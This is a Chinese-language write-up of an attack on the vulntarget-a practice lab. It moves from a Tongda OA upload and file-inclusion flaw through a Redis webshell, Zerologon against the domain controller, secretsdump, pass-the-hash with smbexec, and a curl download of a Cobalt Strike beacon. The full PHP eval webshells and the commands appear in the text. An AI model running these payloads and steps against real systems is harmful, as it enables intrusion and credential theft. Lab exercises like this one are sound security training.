东西是以前写的了。

vulntarget-a 打靶记录

环境详情:

系统Parrot(攻击者)Win7Win2019Win2016
内网IP10.0.20.9810.0.10.11010.0.20.99 10.0.10.111
外网IP192.168.0.128192.168.0.129

机子十分恶臭,会自动休眠img

渗透过程:

首先我们部署好环境,给我们的攻击机和Win7单独分一个Nat即可

图片1

随后我们部署好msf和cs,按照常理nmap对Win7进行扫描。

图片2

图快用的Syn,反正不影响。

80端口为通达OA,目测漏洞利用拿shell,查询知默认空口令,登录成功。

图片3

查询漏洞详情知有文件上传以及任意文件包含。

利用点:ispirit/im/upload.php

构造POST包,上传一句话,返回包中@后第一个为文件夹名,后为动态生成的文件名。

图片4

随后利用文件包含

图片5

不能直接执行很多命令,貌似eval被禁,我们只能先利用文件包含写一个shell。

1
2
3
4
5
6
<?php
$file = fopen("she.php", "w");
$txt = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ1l1bGluJ10pOz8+");
fwrite($file, $txt);
fclose($file);
?>

随后写入成功

图片6

顶级权限,直接上cs的马子。

图片7

配置好listener,我们生成一个马子,蚁剑传到Win7。

图片8

嘎嘎上线,开始做横向。

图片9

端口扫描安排一下。

图片10

粗扫是这些,cs开个socks端口,火狐配置一下。

图片11

应该是为了方便我们发现的。没扫到另一台,可能有别的关系?接着往下做吧。

在win7主机上net user等没有发现域相关信息,考虑进一步进攻10.0.20.99

5985端口开放。

结果卡住了。5985漏洞很少,考虑端口扫描不周全?nmap+proxychains又有点太慢,再用CS内置扫描器扫扫看。

图片12

果然扫漏了。

6379是redis。

图片13

proxychains连上,然后可以写webshell了。

想到还不知道web目录,dirb+proxychains扫一下80

图片14

扫出个phpinfo,暴露路径,redis写shell就好。

1
2
3
4
config set dir C:/phpStudy/PHPTutorial/WWW 
config set dbfilename yulin.php
set webshell "<?php eval($_POST['Yulin']); ?>"
save

然后蚁剑走代理连上.

图片15

再传马子,连接,发现不能上线,说明网络有阻隔,我们以Win7为跳板,cs开一个listener

图片16

生成一个往10.0.20.98的shell即可,此时win2016也是system权限。

在win2016上运行,没反应,关闭WIN7防火墙即可。

图片17

上线成功,看一下win2016的ip段

图片18

解锁新网段,cs内置扫描器扫一下。

扫出最后的2019在10.0.10.110

图片19

走一个pth应该能拿下吧(没拿下来)。

考虑去打域控漏洞了,查了一下可能有Netlogon特权提升漏洞

CVE-2020-1472还有CVE-2021-42287&42278

我们再在win2016做一个listener,监听10.0.10.111:4444.

图片20

代理这块cs直接选择win2016生成一个代理,非常方便。

图片21

proxychains配置一下,运行msfconsole

图片22

这个方便用这个(乐

1
2
3
4
5
set RHOST 10.0.10.110

set NBNAME WIN2019

run

随后

图片23

密码置为空,对应的ntlm为31d6cfe0d16ae931b73c59d7e0c089c0

使用parrot自带的secretsdump

1
proxychains4 impacket-secretsdump vulntarget.com/WIN2019\[email protected] -no-pass

图片24

1
proxychains4 impacket-smbexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]

为了cs上线。我在win2016用cs插件快开了一个web服务器,在win2019执行下载运行即可上线。

1
curl http://10.0.10.111:8082/shared/beacon.exe --location beacon.exe

漂亮的三连链

图片25